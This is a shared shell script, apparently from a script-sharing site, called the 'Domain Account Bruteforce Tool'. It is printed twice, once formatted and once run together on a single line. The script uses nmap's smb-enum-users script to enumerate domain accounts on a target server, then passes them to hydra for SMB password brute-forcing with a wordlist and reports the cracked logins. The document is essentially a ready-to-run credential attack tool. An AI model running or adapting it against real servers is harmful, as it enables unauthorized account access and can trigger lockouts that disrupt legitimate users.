Domain Account Bruteforce Tool

The comments say it all...


#!/bin/sh

echo
echo "*******************************************************"
echo "*                                                     *"
echo "*  Welcome to the Domain Account Bruteforce Tool.     *"
echo "*             By Sean gambles 21st Sep 2010           *"
echo "*******************************************************"
echo
echo "This tool makes use of the nmap smb-enum-users script,"
echo "by basically exporting the results, in a cleaned up form"
echo "into hydra for bruteforcing."
echo
echo "Currently, only working with server 2000, 2003 family."
echo "This is due to server 2008 not allowing unauthenticated"
echo "account enumeration."
echo
echo "*** Please observe account lockout thresholds before"
echo "submitting your password file into this tool, as there"
echo "is no protection against lockouts taking place. ***"
echo
echo "Please enter the target server IP :"
read target
echo "Please enter the path to your password file"
echo "E.g /root/passwords.txt"
read passfile
echo "Enumerating users, please wait...."
nmap -p139,445 -n $target --script=smb-enum-users >/root/nmap-users.txt

#Cleans up the user list file by removing template accounts and computer names.
cat /root/nmap-users.txt |grep -v \\"$" | grep -v Tmpl |grep RID |cut -d "\\" -f2 |cut -d"(" -f1 |sed 's/.$//' >users.txt
rm /root/nmap-users.txt
echo "Trying passwords against all the user accounts, please wait...."
hydra $target smbnt -s445 -L/root/users.txt -P $passfile -t1 -e n -m D >/root/results.txt
rm /root/users.txt
echo "*********************************************************"
echo
echo "Domain accounts found :"
echo
cat results.txt |grep login: |cut -d" " -f6-11

Submitted by Sean Gambles

#!/bin/sh echo echo "*******************************************************" echo "* *" echo "* Welcome to the Domain Account Bruteforce Tool. *" echo "* By Sean gambles 21st Sep 2010 *" echo "*******************************************************" echo echo "This tool makes use of the nmap smb-enum-users script," echo "by basically exporting the results, in a cleaned up form" echo "into hydra for bruteforcing." echo echo "Currently, only working with server 2000, 2003 family." echo "This is due to server 2008 not allowing unauthenticated" echo "account enumeration." echo echo "*** Please observe account lockout thresholds before" echo "submitting your password file into this tool, as there" echo "is no protection against lockouts taking place. ***" echo echo "Please enter the target server IP :" read target echo "Please enter the path to your password file" echo "E.g /root/passwords.txt" read passfile echo "Enumerating users, please wait...." nmap -p139,445 -n $target --script=smb-enum-users >/root/nmap-users.txt #Cleans up the user list file by removing template accounts and computer names. cat /root/nmap-users.txt |grep -v \\"$" | grep -v Tmpl |grep RID |cut -d "\\" -f2 |cut -d"(" -f1 |sed 's/.$//' >users.txt rm /root/nmap-users.txt echo "Trying passwords against all the user accounts, please wait...." hydra $target smbnt -s445 -L/root/users.txt -P $passfile -t1 -e n -m D >/root/results.txt rm /root/users.txt echo "*********************************************************" echo echo "Domain accounts found :" echo cat results.txt |grep login: |cut -d" " -f6-11

Domain Account Bruteforce Tool

Domain Account Bruteforce Tool

Related Scripts